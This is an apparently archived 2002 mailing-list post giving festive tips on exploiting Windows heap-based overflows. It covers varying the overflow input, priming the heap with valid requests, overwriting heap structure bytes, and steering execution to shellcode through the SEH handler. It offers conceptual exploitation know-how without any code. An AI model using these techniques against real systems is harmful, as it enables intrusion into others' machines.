Merry Christmas all, tis the month for knowledge sharing. Some tips and tricks when working with windows heap based overflows to stimulate your mind. *) The more the merrier - If it lets you stuff it in there, stuff it. Different sizes, different characters can give different results. *) Running the exploit Local vs Remote can sometimes matter. *) The only state you can be sure of, is that your request is not the first. But the only way to ensure this is by sending valid requests before the exploit. Numbers vary, find a minumum and it can help in the stability of overflows. *) Remember with heap based overflows you can write multiple sets of 4 bytes. It's not the registers you are overflowing, but a structure. What do the other structure bytes control? Size does matter! http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0105.html * Wheres our code at? It's not just esp that holds important variable locations. Where do all those other numbers point? The first 3 allow you to write code that 99-100% of the time hits the spot. The last two allow you to write any relative jump instruction you need and set the seh handler to your relative jump, thus 99-100% giving execution to your shellcode. Heyas to all who know.
This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 00:09:09 PST